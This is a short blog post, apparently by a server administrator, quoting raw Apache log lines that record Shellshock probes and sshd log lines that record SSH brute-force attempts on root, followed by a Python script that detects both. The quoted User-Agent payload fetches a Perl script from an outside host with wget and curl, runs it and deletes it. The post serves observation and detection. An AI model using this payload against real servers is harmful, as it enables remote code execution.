Shellshock again

It had been many days since anyone tried to exploit Shellshock; last night they hammered the server for a couple of hours…


218.78.214.9 - - [06/Jan/2015:22:55:45 +0100] "GET /cgi-bin/recent.cgi HTTP/1.1" 404 323 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
218.78.214.9 - - [06/Jan/2015:22:55:40 +0100] "GET /cgi-bin/php5 HTTP/1.1" 404 323 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
218.78.214.9 - - [06/Jan/2015:22:55:40 +0100] "GET /cgi-bin/php4 HTTP/1.1" 404 323 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
218.78.214.9 - - [06/Jan/2015:22:55:39 +0100] "GET /cgi-bin/php HTTP/1.1" 404 323 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
218.78.214.9 - - [06/Jan/2015:22:55:35 +0100] "GET /cgi-bin/main.cgi HTTP/1.1" 404 323 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"

And this one I really hadn't seen in a while… brute-force attacks against SSH

Jan 6 08:07:11 ks38032 sshd[7677]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:07:04 ks38032 sshd[7675]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:57 ks38032 sshd[7630]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:50 ks38032 sshd[7628]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:43 ks38032 sshd[7626]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:36 ks38032 sshd[7622]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:29 ks38032 sshd[7620]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:21 ks38032 sshd[7618]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root

Jan 6 08:00:49 ks38032 sshd[7229]: Failed password for invalid user root from 222.186.21.207 port 4450 ssh2
Jan 6 08:00:44 ks38032 sshd[7227]: Failed password for invalid user root from 222.186.21.207 port 3361 ssh2
Jan 6 08:00:42 ks38032 sshd[7227]: Failed password for invalid user root from 222.186.21.207 port 3361 ssh2
Jan 6 08:00:37 ks38032 sshd[7225]: Failed password for invalid user root from 222.186.21.207 port 2299 ssh2
Jan 6 08:00:35 ks38032 sshd[7225]: Failed password for invalid user root from 222.186.21.207 port 2299 ssh2
Jan 6 08:00:30 ks38032 sshd[7219]: Failed password for invalid user root from 222.186.21.207 port 1431 ssh2
Jan 6 08:00:28 ks38032 sshd[7219]: Failed password for invalid user root from 222.186.21.207 port 1431 ssh2
Jan 6 08:00:24 ks38032 sshd[7213]: Failed password for invalid user root from 222.186.21.207 port 4538 ssh2

A busy night…
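As an added example (not from the original post), a small Python detector for the two patterns these logs show: the Shellshock function-definition prefix "() { :;};" in the User-Agent or Referer of an Apache combined log, and repeated failed sshd logins per source host in syslog. The sample lines are constructed in the same formats as the post's logs, using documentation IPs, and the alert threshold is an assumption.

```python
import re
from collections import Counter
# Shellshock probe: a bash function definition "() { :;};" planted in a header that a CGI
# handler exports into the environment; what follows the "};" is the command bash runs.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")
# Apache combined log; quoted fields may contain escaped quotes (\").
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>(?:[^"\\]|\\.)*)" '
                       r'(?P<status>\d{3}) \S+ "(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$')
# sshd syslog records; pam_unix and "Failed password" lines both describe a failed attempt.
SYSLOG_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[(?P<pid>\d+)\]: (?P<msg>.*)$")
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?\S+ from (?P<ip>\S+) port")
PAM_RE = re.compile(r"authentication failure;.*\brhost=(?P<ip>\S*)")

# Constructed sample lines in the two formats quoted in the post (documentation IPs).
ACCESS_SAMPLE = [
    '203.0.113.7 - - [06/Jan/2015:22:55:45 +0100] "GET /cgi-bin/recent.cgi HTTP/1.1" 404 323 "-" '
    '"() { :;};/usr/bin/perl -e \'print 1\'"',
    '198.51.100.3 - - [06/Jan/2015:23:01:02 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
AUTH_SAMPLE = [
    "Jan  6 08:00:24 ks38032 sshd[7213]: Failed password for invalid user root from 198.51.100.9 port 4538 ssh2",
    "Jan  6 08:00:24 ks38032 sshd[7213]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=198.51.100.9 user=root",
    "Jan  6 08:00:28 ks38032 sshd[7219]: Failed password for invalid user root from 198.51.100.9 port 1431 ssh2",
    "Jan  6 08:00:30 ks38032 sshd[7219]: Failed password for invalid user root from 198.51.100.9 port 1431 ssh2",
    "Jan  6 08:00:35 ks38032 sshd[7225]: Failed password for invalid user root from 198.51.100.9 port 2299 ssh2",
    "Jan  6 08:05:00 ks38032 sshd[7300]: Failed password for alice from 192.0.2.5 port 50000 ssh2",
]

def find_shellshock(access_lines):
    """(client_ip, request, field) for each request whose User-Agent or Referer carries the probe."""
    hits = []
    for line in access_lines:
        m = ACCESS_RE.match(line)
        if m:
            for field in ("ua", "ref"):
                if SHELLSHOCK_RE.search(m.group(field)):
                    hits.append((m.group("ip"), m.group("req"), field))
                    break
    return hits

def ssh_bruteforce(auth_lines, threshold=5):
    """Failed sshd logins per source host; a pam_unix + Failed-password pair for one attempt counts once."""
    seen, counts = set(), Counter()
    for line in auth_lines:
        m = SYSLOG_RE.match(line)
        f = m and (FAILED_RE.search(m.group("msg")) or PAM_RE.search(m.group("msg")))
        if f and f.group("ip") and (m.group("ts"), m.group("pid")) not in seen:
            seen.add((m.group("ts"), m.group("pid")))  # same second and pid: one attempt, two records
            counts[f.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Feed the real files (access log and auth.log) line by line to the two functions; the pid/second dedup matters because each failed attempt on the post's host produced both a pam_unix line and a "Failed password" line.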